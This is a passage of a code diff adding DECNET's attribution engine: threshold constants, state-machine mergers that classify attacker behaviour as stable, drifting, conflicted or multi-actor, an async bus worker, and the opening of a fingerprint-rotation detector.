@@ -0,0 +1,21 @@
+"""DECNET attribution engine — v0 aggregation library.
+
+Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
+observations. No I/O, no bus, no DB. The bus subscriber and DB writes
+live in :mod:`decnet.correlation.attribution_worker` so this package
+stays trivially testable with synthetic observation lists.
+
+See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
+explicit bright line: this engine does NOT do persona classification
+(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
+named persons. It surfaces *behavioural coherence* and *behavioural
+drift*, and stops there.
+"""
+from __future__ import annotations
+
+from decnet.correlation.attribution.aggregate import (
+    AttributionState,
+    aggregate_observations,
+)
+
+__all__ = ["AttributionState", "aggregate_observations"]
--- a/decnet/correlation/attribution/_thresholds.py
+++ b/decnet/correlation/attribution/_thresholds.py
@@ -0,0 +1,62 @@
+"""Calibration thresholds for the attribution engine — every magic
+number lives here, named, with the calibration source cited.
+
+v0 values are heuristic. Real calibration ships when red-team
+exercises produce labelled trace data
+(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
+are the engine's only knobs; aggregate.py never embeds a literal.
+"""
+from __future__ import annotations
+
+# ── Categorical merger ────────────────────────────────────────────────
+# Last-N window size for the categorical state machine. 5 calibrates
+# against typical session counts (most attackers are observed < 10
+# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
+# 2"). Operators with long-running attackers will want a wider window
+# in v1.
+CATEGORICAL_WINDOW_N = 5
+
+# Minimum observations before the merger emits anything other than
+# ``unknown``. Below this floor the state machine has no signal.
+MIN_OBSERVATIONS_FOR_STATE = 3
+
+# Categorical merger is one-outlier-tolerant: in a window of N=5, the
+# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
+CATEGORICAL_MAJORITY_THRESHOLD = 4
+
+# ── Numeric merger ────────────────────────────────────────────────────
+# EWMA smoothing factor for numeric primitives. 0.3 weights recent
+# observations enough to surface drift quickly without flapping on
+# single outliers.
+NUMERIC_EWMA_ALPHA = 0.3
+
+# Coefficient-of-variation thresholds: dispersion / |mean|.
+NUMERIC_STABLE_DISPERSION_PCT = 0.20    # < 20% of mean → stable
+NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30     # mean moved > 30% → drifting
+NUMERIC_CONFLICT_DISPERSION_PCT = 1.0   # > 100% of mean → conflicted
+
+# ── Hash merger ───────────────────────────────────────────────────────
+# Rotations within HASH_DRIFT_WINDOW count toward state transitions.
+# Below DRIFT_MAX → drifting; above → conflicted. The values mirror the
+# DEBT-032 fingerprint-rotation calibration — bumped by one because
+# the attribution engine takes one rotation as evidence-of-life, not
+# yet evidence-of-drift.
+HASH_DRIFT_MAX = 2
+HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60  # 24h
+
+# ── Multi-actor cap ───────────────────────────────────────────────────
+# multi_actor confidence is capped to keep the dashboard honest about
+# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
+# flapping primitives on flaky networks look like two operators.
+MULTI_ACTOR_MAX_CONFIDENCE = 0.6
+
+# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
+# Minimum number of primitives that must independently flag
+# ``multi_actor`` for the same identity before
+# ``attribution.profile.multi_actor_suspected`` fires.
+MULTI_ACTOR_MIN_PRIMITIVES = 2
+
+# Tick interval for the periodic walk in
+# :mod:`decnet.correlation.attribution_worker`. Configurable via env
+# var in v1; hardcoded in v0.
+MULTI_ACTOR_TICK_SECS = 60.0
--- a/decnet/correlation/attribution/aggregate.py
+++ b/decnet/correlation/attribution/aggregate.py
@@ -0,0 +1,418 @@
+"""Per-(identity, primitive) state-machine — the attribution engine's
+core merge logic.
+
+Pure: given a list of BEHAVE observations for one
+``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
+returns the derived state. No DB, no bus, no I/O. The worker
+(``decnet.correlation.attribution_worker``) is responsible for loading
+the observations and writing the state row.
+
+State vocabulary is frozen at five values (see
+``ATTRIBUTION-ENGINE.md``):
+
+* ``unknown``      — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
+* ``stable``       — recent N agree
+* ``drifting``     — recent N stable but disagree with older N
+* ``conflicted``   — recent N split
+* ``multi_actor``  — conflicted + cross-session alternation pattern
+
+Phase 2 ships :func:`_aggregate_categorical` (the dominant ValueKind
+for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
+the ValueKind dispatcher in :func:`aggregate_observations`.
+"""
+from __future__ import annotations
+
+from collections import Counter
+from dataclasses import dataclass
+from typing import Any, Sequence
+
+from decnet.correlation.attribution import _thresholds as _T
+
+__all__ = [
+    "AttributionState",
+    "aggregate_observations",
+    "aggregate_categorical",
+    "aggregate_numeric",
+    "aggregate_hash",
+]
+
+
+@dataclass(frozen=True)
+class AttributionState:
+    """Output of the merger for one ``(identity, primitive)`` pair.
+
+    The fields map onto :class:`AttributionStateRow` columns; the
+    worker composes the final dict for ``upsert_attribution_state``
+    by adding ``identity_uuid`` + ``primitive`` (the merger does not
+    own the natural key) and a ``last_change_ts`` derived from the
+    prior row.
+    """
+
+    current_value: Any
+    state: str
+    confidence: float
+    observation_count: int
+    last_observation_ts: float
+
+
+def aggregate_observations(
+    observations: Sequence[dict[str, Any]],
+    *,
+    value_kind: str | None = None,
+) -> AttributionState:
+    """Run the merger over *observations* and return derived state.
+
+    *observations* is a list of dicts with at minimum ``value``,
+    ``ts``, ``confidence`` (matching
+    ``ObservationRow.observations_time_series`` output). Sessions
+    are derived from the ``ts`` axis — the merger does not need a
+    separate session id; cross-session alternation is detected by
+    the gap distribution. Sessions are NOT collapsed before the
+    merger; ``multi_actor`` reasons over the full per-observation
+    series.
+
+    *value_kind* is a hint from the BEHAVE primitive registry — Phase
+    2 only honours ``"categorical"`` (or ``None``, treated as
+    categorical). Phase 3 will dispatch on ``"numeric"`` /
+    ``"hash"`` to the matching merger.
+    """
+    if not observations:
+        return _unknown(0.0, count=0)
+    if value_kind in (None, "categorical"):
+        return aggregate_categorical(observations)
+    if value_kind == "numeric":
+        return aggregate_numeric(observations)
+    if value_kind == "hash":
+        return aggregate_hash(observations)
+    raise ValueError(
+        f"aggregate_observations: unknown value_kind={value_kind!r}; "
+        "expected 'categorical' | 'numeric' | 'hash' | None",
+    )
+
+
+def aggregate_numeric(
+    observations: Sequence[dict[str, Any]],
+) -> AttributionState:
+    """Numeric merger — for primitives whose ``value`` is an int /
+    float (e.g. ``toolchain.c2.beacon_interval_ms``,
+    ``motor.paste_burst_rate``).
+
+    Compares the EWMA of the recent window against the EWMA of the
+    older window; reports dispersion as coefficient of variation.
+
+    * < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
+    * recent CV < ``NUMERIC_STABLE_DISPERSION_PCT`` *and* mean shift
+      from older window < ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``stable``
+    * mean shifted >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
+    * recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
+    * otherwise → ``stable`` (falling-through case for moderate
+      dispersion that hasn't yet become drift)
+
+    Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
+    tighter dispersion = higher confidence. Conflicted is ``0.5``
+    by convention; we cannot meaningfully claim certainty in a
+    statistic computed over a degenerate sample.
+
+    ``current_value`` is the recent EWMA, not the last raw
+    observation: numeric primitives are noisy by nature and
+    surfacing the smoothed estimate keeps the dashboard from
+    flapping on every tick. ``multi_actor`` is *not* a numeric state
+    in v0 — bimodal distributions belong to the categorical
+    detector once the primitive's value space is bucketed.
+    """
+    n = len(observations)
+    last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
+    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
+        return AttributionState(
+            current_value=_safe_float(observations[-1].get("value")) if n else None,
+            state="unknown",
+            confidence=0.0,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    window = _T.CATEGORICAL_WINDOW_N
+    recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
+    older_vals = [
+        _safe_float(o.get("value"))
+        for o in observations[-2 * window: -window]
+    ]
+    recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
+    recent_cv = _coef_of_variation(recent_vals, recent_mean)
+
+    if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
+        return AttributionState(
+            current_value=recent_mean,
+            state="conflicted",
+            confidence=0.5,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    if older_vals:
+        older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
+        denom = abs(older_mean) if older_mean != 0 else 1.0
+        mean_shift = abs(recent_mean - older_mean) / denom
+        if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
+            return AttributionState(
+                current_value=recent_mean,
+                state="drifting",
+                confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
+                observation_count=n,
+                last_observation_ts=last_ts,
+            )
+
+    return AttributionState(
+        current_value=recent_mean,
+        state="stable",
+        confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
+        observation_count=n,
+        last_observation_ts=last_ts,
+    )
+
+
+def aggregate_hash(
+    observations: Sequence[dict[str, Any]],
+) -> AttributionState:
+    """Hash merger — for rotation-resistant fingerprints
+    (``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
+
+    The merger does NOT recompute hashes; DEBT-032
+    (``decnet.correlation.fingerprint_rotation``) already produces
+    one observation per rotation event. The state machine counts
+    distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
+    most recent observation:
+
+    * 0 rotations (single hash, any count) → ``stable``
+    * 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
+    * > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
+
+    ``unknown`` fires only on empty input — a single hash with one
+    observation is enough signal to say "stable", because hashes
+    don't have a noisy baseline the way categorical/numeric
+    primitives do.
+
+    ``current_value`` is the most recent hash. Confidence is
+    ``1 / (1 + rotations_in_window)`` — one rotation halves
+    confidence, two thirds it, etc.
+    """
+    n = len(observations)
+    if n == 0:
+        return _unknown(0.0, count=0)
+    last_ts = float(observations[-1].get("ts", 0.0))
+    last_value = observations[-1].get("value")
+
+    window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
+    in_window = [
+        o for o in observations
+        if float(o.get("ts", 0.0)) >= window_start
+    ]
+    distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
+    rotations = max(0, distinct - 1)
+    confidence = 1.0 / (1.0 + rotations)
+
+    if rotations == 0:
+        state = "stable"
+    elif rotations <= _T.HASH_DRIFT_MAX:
+        state = "drifting"
+    else:
+        state = "conflicted"
+
+    return AttributionState(
+        current_value=last_value,
+        state=state,
+        confidence=confidence,
+        observation_count=n,
+        last_observation_ts=last_ts,
+    )
+
+
+def _ewma(values: Sequence[float], alpha: float) -> float:
+    """Single-pass EWMA. Empty input is illegal; callers gate on
+    ``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
+    it = iter(values)
+    smoothed = next(it)
+    for v in it:
+        smoothed = alpha * v + (1.0 - alpha) * smoothed
+    return smoothed
+
+
+def _coef_of_variation(values: Sequence[float], mean: float) -> float:
+    """Population-style CV = stdev / |mean|. Returns 0 on a constant
+    signal; returns +inf-equivalent (1e9) when the mean is exactly
+    zero and the signal isn't constant — so the conflicted threshold
+    fires without us having to special-case it upstream."""
+    if not values:
+        return 0.0
+    diffs_sq = [(v - mean) ** 2 for v in values]
+    variance = sum(diffs_sq) / len(values)
+    stdev = variance ** 0.5
+    if mean == 0:
+        return 0.0 if stdev == 0 else 1e9
+    return stdev / abs(mean)
+
+
+def _safe_float(value: Any) -> float:
+    """Defensive coercion — observations may carry value=None on
+    unknown-emitter primitives. Treat None as 0.0; the dispersion
+    check will surface the resulting flat baseline as 'stable'
+    which is the honest answer for a single-observation primitive
+    that hasn't fired yet."""
+    if value is None:
+        return 0.0
+    if isinstance(value, bool):
+        return 1.0 if value else 0.0
+    return float(value)
+
+
+def aggregate_categorical(
+    observations: Sequence[dict[str, Any]],
+) -> AttributionState:
+    """Categorical merger — the dominant case for BEHAVE-SHELL.
+
+    Compares the recent N-window against the older N-window. With
+    ``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
+    = 4``:
+
+    * fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
+    * recent window has a clear majority + matches older window → ``stable``
+    * recent window has a clear majority + differs from older window → ``drifting``
+    * recent window split + alternation pattern across observations → ``multi_actor``
+    * recent window split + no alternation → ``conflicted``
+
+    Confidence is the recent-window agreement ratio; ``multi_actor``
+    is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. The merger returns
+    the most-recent observation's value as ``current_value``
+    regardless of state — the dashboard wants a value to render
+    even on ``conflicted`` rows.
+    """
+    n = len(observations)
+    last_ts = float(observations[-1].get("ts", 0.0))
+    last_value = observations[-1].get("value")
+    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
+        return AttributionState(
+            current_value=last_value,
+            state="unknown",
+            confidence=0.0,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    window = _T.CATEGORICAL_WINDOW_N
+    recent = observations[-window:]
+    recent_values = [o.get("value") for o in recent]
+    recent_count = Counter(recent_values)
+    top_value, top_count = recent_count.most_common(1)[0]
+    recent_size = len(recent)
+    confidence = top_count / recent_size
+
+    is_recent_clear = top_count >= min(
+        _T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
+    )
+
+    if not is_recent_clear:
+        # Split recent window. Distinguish multi_actor (alternation)
+        # from random conflict.
+        if _is_alternation(observations):
+            return AttributionState(
+                current_value=last_value,
+                state="multi_actor",
+                confidence=min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
+                observation_count=n,
+                last_observation_ts=last_ts,
+            )
+        return AttributionState(
+            current_value=last_value,
+            state="conflicted",
+            confidence=confidence,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    # Recent window has a clear majority. Compare to the prior
+    # window to decide stable vs drifting.
+    older = observations[-2 * window: -window]
+    if not older:
+        # Only one window's worth of data — call it stable. The
+        # dashboard already gates "unknown" on
+        # MIN_OBSERVATIONS_FOR_STATE so this branch is reachable
+        # only when the operator has produced enough observations
+        # for one full window but not two.
+        return AttributionState(
+            current_value=top_value,
+            state="stable",
+            confidence=confidence,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    older_values = [o.get("value") for o in older]
+    older_count = Counter(older_values)
+    older_top_value, older_top_count = older_count.most_common(1)[0]
+    older_size = len(older)
+    older_clear = older_top_count >= min(
+        _T.CATEGORICAL_MAJORITY_THRESHOLD, older_size,
+    )
+
+    if not older_clear:
+        # Older window was itself conflicted; we just stabilised.
+        # That's drift in the colloquial sense — the attacker
+        # converged onto a single behaviour.
+        return AttributionState(
+            current_value=top_value,
+            state="drifting",
+            confidence=confidence,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    if older_top_value != top_value:
+        return AttributionState(
+            current_value=top_value,
+            state="drifting",
+            confidence=confidence,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+    return AttributionState(
+        current_value=top_value,
+        state="stable",
+        confidence=confidence,
+        observation_count=n,
+        last_observation_ts=last_ts,
+    )
+
+
+def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
+    """Heuristic: do recent observations alternate between two values
+    (operator A → B → A → B), as opposed to random thrashing?
+
+    Conservative: requires at least 4 observations in the window,
+    exactly 2 distinct values, and that flips outnumber repeats by
+    at least 2:1. ATTRIBUTION-ENGINE.md §"Open question 1" warns
+    that flapping primitives on flaky networks look like two
+    operators; this guard is what keeps the false-positive rate down.
+    """
+    window = _T.CATEGORICAL_WINDOW_N
+    recent = observations[-window:]
+    if len(recent) < 4:
+        return False
+    values = [o.get("value") for o in recent]
+    distinct = set(values)
+    if len(distinct) != 2:
+        return False
+    flips = sum(
+        1 for i in range(1, len(values)) if values[i] != values[i - 1]
+    )
+    repeats = (len(values) - 1) - flips
+    return flips >= 2 * max(repeats, 1)
+
+
+def _unknown(last_ts: float, *, count: int) -> AttributionState:
+    return AttributionState(
+        current_value=None,
+        state="unknown",
+        confidence=0.0,
+        observation_count=count,
+        last_observation_ts=last_ts,
+    )
--- a/decnet/correlation/attribution_worker.py
+++ b/decnet/correlation/attribution_worker.py
@@ -0,0 +1,394 @@
+"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
+
+Subscribes to ``attacker.observation.>`` and, for each event, ensures
+the source attacker has a stub identity in ``attacker_identities``.
+Phase 1 does **not** invoke the merger or write
+``attribution_state`` rows; that wiring lands in Phase 4 once the
+Phase 2/3 mergers are in.
+
+Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
+with a wake event, fall back to poll-only if the bus is unavailable,
+publish derived events with :func:`publish_safely`, log per-handler
+exceptions and continue.
+
+Trigger isolation: the per-event handler is wrapped in a single
+try/except. Any exception is logged and the loop continues with the
+next event. This is the same posture BEHAVE-SHELL's
+``_handler.handle_session_ended`` adopts.
+"""
+from __future__ import annotations
+
+import asyncio
+import contextlib
+from typing import Any
+
+from decnet.bus import topics as _topics
+from decnet.bus.base import BaseBus
+from decnet.bus.factory import get_bus
+from decnet.bus.publish import (
+    publish_safely,
+    run_control_listener_signal as _run_control_listener_signal,
+    run_health_heartbeat as _run_health_heartbeat,
+)
+from decnet.correlation.attribution import _thresholds as _T
+from decnet.correlation.attribution.aggregate import aggregate_observations
+from decnet.logging import get_logger
+from decnet.web.db.repository import BaseRepository
+
+try:
+    from behave_shell.spec import (
+        PRIMITIVE_REGISTRY,
+        ValueKind,
+    )
+    _BEHAVE_REGISTRY_AVAILABLE = True
+except ImportError:  # pragma: no cover
+    PRIMITIVE_REGISTRY = {}
+    ValueKind = None
+    _BEHAVE_REGISTRY_AVAILABLE = False
+
+log = get_logger("correlation.attribution_worker")
+
+_WORKER_NAME = "attribution"
+_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
+
+
+async def run_attribution_loop(
+    repo: BaseRepository,
+    *,
+    shutdown: asyncio.Event | None = None,
+    multi_actor_tick_secs: float | None = None,
+) -> None:
+    """Run the attribution worker until cancelled.
+
+    Three concurrent tasks under one supervisor:
+
+    1. ``_consume_observations`` — bus subscription on
+       ``attacker.observation.>``; per-event handler upserts state.
+    2. ``_multi_actor_tick`` — periodic walk of ``attribution_state``
+       firing ``attribution.profile.multi_actor_suspected`` when an
+       identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
+       ``multi_actor`` state. Phase 5.
+    3. Health + control standard channels.
+
+    *shutdown* is an optional external stop signal.
+    *multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
+    (tests use this to drive the correlator without sleeping for a
+    minute).
+    """
+    log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
+
+    bus: BaseBus | None = None
+    sub_task: asyncio.Task | None = None
+    tick_task: asyncio.Task | None = None
+    heartbeat_task: asyncio.Task | None = None
+    control_task: asyncio.Task | None = None
+    tick_secs = (
+        multi_actor_tick_secs
+        if multi_actor_tick_secs is not None
+        else _T.MULTI_ACTOR_TICK_SECS
+    )
+    try:
+        candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
+        await candidate.connect()
+        bus = candidate
+        sub_task = asyncio.create_task(
+            _consume_observations(bus, repo),
+        )
+        tick_task = asyncio.create_task(
+            _multi_actor_tick_loop(bus, repo, tick_secs),
+        )
+        heartbeat_task = asyncio.create_task(
+            _run_health_heartbeat(bus, _WORKER_NAME),
+        )
+        control_task = asyncio.create_task(
+            _run_control_listener_signal(bus, _WORKER_NAME),
+        )
+    except Exception as exc:  # noqa: BLE001
+        log.warning(
+            "attribution worker: bus unavailable, idle until bus returns: %s",
+            exc,
+        )
+
+    if shutdown is None:
+        shutdown = asyncio.Event()
+
+    try:
+        await shutdown.wait()
+    except (asyncio.CancelledError, KeyboardInterrupt):
+        log.info("attribution worker stopped")
+    finally:
+        for task in (sub_task, tick_task, heartbeat_task, control_task):
+            if task is None:
+                continue
+            task.cancel()
+            with contextlib.suppress(asyncio.CancelledError, Exception):
+                await task
+        if bus is not None:
+            with contextlib.suppress(Exception):
+                await bus.close()
+
+
+async def _consume_observations(
+    bus: BaseBus, repo: BaseRepository,
+) -> None:
+    """Pull events off ``attacker.observation.>`` and dispatch each
+    to :func:`handle_observation_event`.
+
+    Per-event exceptions are caught and logged; the subscription
+    survives bad payloads. If the subscription itself dies (bus
+    disconnect), the worker idles — the supervisor systemd unit
+    will restart on a clean exit.
+    """
+    try:
+        sub = bus.subscribe(_OBSERVATION_PATTERN)
+        async with sub:
+            async for event in sub:
+                try:
+                    await handle_observation_event(bus, repo, event)
+                except Exception:  # noqa: BLE001
+                    log.exception("attribution worker: handler failed")
+    except asyncio.CancelledError:
+        raise
+    except Exception as exc:  # noqa: BLE001
+        log.warning(
+            "attribution worker: subscriber for %s died (%s)",
+            _OBSERVATION_PATTERN, exc,
+        )
+
+
+async def handle_observation_event(
+    bus: BaseBus | None,
+    repo: BaseRepository,
+    event: Any,
+) -> None:
+    """Handle one ``attacker.observation.<primitive>`` event.
+
+    Phase 1: ensure the source attacker has a stub identity, then log
+    and return. Phase 4 will: load prior state, run merger, upsert
+    new state, emit ``attribution.profile.state_changed`` on
+    transition.
+
+    *event* is whatever shape :class:`BaseBus`'s subscription yields —
+    a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
+    fields. The payload carries the BEHAVE envelope plus DECNET-side
+    ``attacker_uuid`` denorm (see
+    ``decnet.profiler.behave_shell._handler._publish_observation``).
+    """
+    payload = _payload_of(event)
+    attacker_uuid = payload.get("attacker_uuid")
+    primitive = payload.get("primitive")
+    if not attacker_uuid or not primitive:
+        log.debug(
+            "attribution worker: skipping malformed event (uuid=%r primitive=%r)",
+            attacker_uuid, primitive,
+        )
+        return
+    identity_uuid = await repo.ensure_stub_identity_for_attacker(
+        str(attacker_uuid),
+    )
+    if identity_uuid is None:
+        log.info(
+            "attribution worker: no Attacker row for uuid=%s yet; deferring",
+            attacker_uuid,
+        )
+        return
+    primitive_str = str(primitive)
+
+    # Load the full per-(identity, primitive) observation series.
+    # v0 with 1:1 stub identities, this is the single attacker's
+    # series; v1's clusterer makes it a cross-attacker union.
+    observations = await repo.observations_for_identity_primitive(
+        identity_uuid, primitive_str,
+    )
+    if not observations:
+        log.debug(
+            "attribution worker: no observations yet for identity=%s "
+            "primitive=%s (race with upsert)",
+            identity_uuid, primitive_str,
+        )
+        return
+
+    # Run merger.
+    value_kind = _value_kind_for(primitive_str)
+    new_state = aggregate_observations(observations, value_kind=value_kind)
+
+    # Load prior state to detect transitions.
+    prior = await repo.get_attribution_state(identity_uuid, primitive_str)
+    state_changed = prior is None or prior.get("state") != new_state.state
+
+    # Persist. last_change_ts is locked to the prior row when state is
+    # unchanged so the dashboard's "stable since" timestamp doesn't
+    # reset on every observation.
+    if prior is not None and not state_changed:
+        last_change_ts = float(prior.get("last_change_ts", new_state.last_observation_ts))
+    else:
+        last_change_ts = new_state.last_observation_ts
+    await repo.upsert_attribution_state({
+        "identity_uuid": identity_uuid,
+        "primitive": primitive_str,
+        "current_value": new_state.current_value,
+        "state": new_state.state,
+        "confidence": new_state.confidence,
+        "observation_count": new_state.observation_count,
+        "last_change_ts": last_change_ts,
+        "last_observation_ts": new_state.last_observation_ts,
+    })
+
+    # Emit state_changed only on transition. Idempotent re-runs (same
+    # observations, same merger output) produce no event — matches
+    # the loop-prevention invariant that ttp.tagged uses.
+    if state_changed and bus is not None:
+        await publish_safely(
+            bus,
+            _topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
+            {
+                "identity_uuid": identity_uuid,
+                "primitive": primitive_str,
+                "old_state": prior.get("state") if prior else None,
+                "new_state": new_state.state,
+                "current_value": new_state.current_value,
+                "confidence": new_state.confidence,
+                "observation_count": new_state.observation_count,
+                "ts": new_state.last_observation_ts,
+            },
+            event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
+        )
+        log.info(
+            "attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
+            identity_uuid, primitive_str,
+            (prior or {}).get("state") or "<new>", new_state.state,
+            new_state.confidence,
+        )
+
+
+def _value_kind_for(primitive: str) -> str:
+    """Resolve a BEHAVE primitive name to the merger's ValueKind tag.
+
+    Maps the BEHAVE registry's ``ValueKind`` enum onto the three
+    mergers the engine ships:
+
+    * ``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` / ``ARRAY`` →
+      ``"categorical"`` (BOOL is a 2-cardinality categorical;
+      FREE_STRING and ARRAY collapse to opaque-token categorical
+      until a v1 specialised merger lands)
+    * ``NUMERIC`` → ``"numeric"``
+    * ``HASH``    → ``"hash"``
+
+    Unknown primitives (registry miss) default to categorical — the
+    safest fallback because the categorical merger is one-outlier-
+    tolerant and won't lie about confidence on noisy categorical
+    data the way a numeric merger would on non-numeric values.
+    """
+    if not _BEHAVE_REGISTRY_AVAILABLE:
+        return "categorical"
+    spec = PRIMITIVE_REGISTRY.get(primitive)
+    if spec is None or ValueKind is None:
+        return "categorical"
+    if spec.kind is ValueKind.NUMERIC:
+        return "numeric"
+    if spec.kind is ValueKind.HASH:
+        return "hash"
+    return "categorical"
+
+
+def _payload_of(event: Any) -> dict[str, Any]:
+    """Extract the dict payload from a BusEvent or fall through if
+    *event* is already a dict (test fixtures may pass either)."""
+    payload = getattr(event, "payload", event)
+    return payload if isinstance(payload, dict) else {}
+
+
+async def _multi_actor_tick_loop(
+    bus: BaseBus, repo: BaseRepository, interval_secs: float,
+) -> None:
+    """Walk ``attribution_state`` every *interval_secs* and emit
+    ``attribution.profile.multi_actor_suspected`` for any identity
+    whose multi_actor primitives changed since the last tick.
+
+    Dedupe: in-memory ``last_fired`` map keyed on identity_uuid →
+    frozenset(primitives). Same primitive set as last fire → no
+    re-emit. New primitive joining the set → re-emit. Set shrinks
+    below ``MULTI_ACTOR_MIN_PRIMITIVES`` → drop the entry so it
+    re-arms.
+
+    In-memory dedup is honest for v0 — restart-resets are
+    acceptable because the underlying ``attribution_state`` rows
+    persist; on first tick after restart we re-emit the current
+    set. v1 may persist a ``multi_actor_suspect_log`` table.
+    """
+    last_fired: dict[str, frozenset[str]] = {}
+    try:
+        while True:
+            try:
+                await tick_multi_actor(bus, repo, last_fired)
+            except Exception:  # noqa: BLE001
+                log.exception("attribution worker: multi_actor tick failed")
+            await asyncio.sleep(interval_secs)
+    except asyncio.CancelledError:
+        raise
+
+
+async def tick_multi_actor(
+    bus: BaseBus | None,
+    repo: BaseRepository,
+    last_fired: dict[str, frozenset[str]],
+) -> int:
+    """One pass of the cross-primitive correlator. Public for tests.
+
+    Returns the number of ``multi_actor_suspected`` events emitted.
+    """
+    candidates = await repo.list_multi_actor_identities()
+    fired = 0
+    seen_now: set[str] = set()
+    for entry in candidates:
+        identity_uuid = str(entry["identity_uuid"])
+        primitives: list[str] = sorted(entry.get("primitives") or [])
+        seen_now.add(identity_uuid)
+        if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
+            # Repo already filters to >= 2 today; defensive against
+            # future schema drift.
+            continue
+        signature = frozenset(primitives)
+        if last_fired.get(identity_uuid) == signature:
+            continue
+        last_fired[identity_uuid] = signature
+        if bus is None:
+            continue
+        await publish_safely(
+            bus,
+            _topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
+            {
+                "identity_uuid": identity_uuid,
+                "primitives": primitives,
+                "evidence_summary": (
+                    f"{len(primitives)} primitives flagged multi_actor"
+                ),
+                "confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
+                "ts": _now(),
+            },
+            event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
+        )
+        fired += 1
+        log.info(
+            "attribution worker: multi_actor_suspected identity=%s primitives=%s",
+            identity_uuid, primitives,
+        )
+    # Rearm: any identity that was in last_fired but no longer in
+    # candidates dropped below the threshold; remove so the next
+    # qualifying flap re-fires.
+    for stale in [k for k in last_fired if k not in seen_now]:
+        del last_fired[stale]
+    return fired
+
+
+def _now() -> float:
+    """Wall-clock seconds. Wrapped so tests can monkeypatch."""
+    import time
+    return time.time()
+
+
+__all__ = [
+    "run_attribution_loop",
+    "handle_observation_event",
+    "tick_multi_actor",
+]
--- a/decnet/correlation/fingerprint_rotation.py
+++ b/decnet/correlation/fingerprint_rotation.py
@@ -0,0 +1,153 @@
+"""Attacker substrate-fingerprint rotation detection.
+
+Called inline from the prober at each fingerprint emit site.  Looks up
+the last persisted hash for ``(attacker_uuid, port, probe_type)``;
+when the new hash differs from the last one, emits a derived
+``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
+stamps the ``Attacker`` row's rotation telemetry.
+
+This is a pure library — no daemon, no async loop.  The prober is the
+only producer.  We just teach it to derive a second event on hash
+flip without standing up another worker (DEBT-032).
+"""
+from __future__ import annotations
+
+import uuid as _uuid
+from dataclasses import dataclass
+from datetime import datetime
+from typing import Any, Callable, Literal
+
+from sqlmodel import Session, select
+
+from decnet.web.db.models import Attacker, AttackerFingerprintState
+
+ProbeType = Literal["jarm", "hassh", "tcpfp"]
+RotationKind = Literal[
+    "no_attacker_row",  # caller raced ahead of correlator; skip silently
+    "first_sighting",   # state row created, no prior hash
+    "unchanged",        # same hash as last sighting
+    "rotated",          # hash differs; event emitted, Attacker stamped
+]
+
+PublishFn = Callable[[str, dict[str, Any]], None]
+SyslogFn = Callable[[str, dict[str, Any]], None]
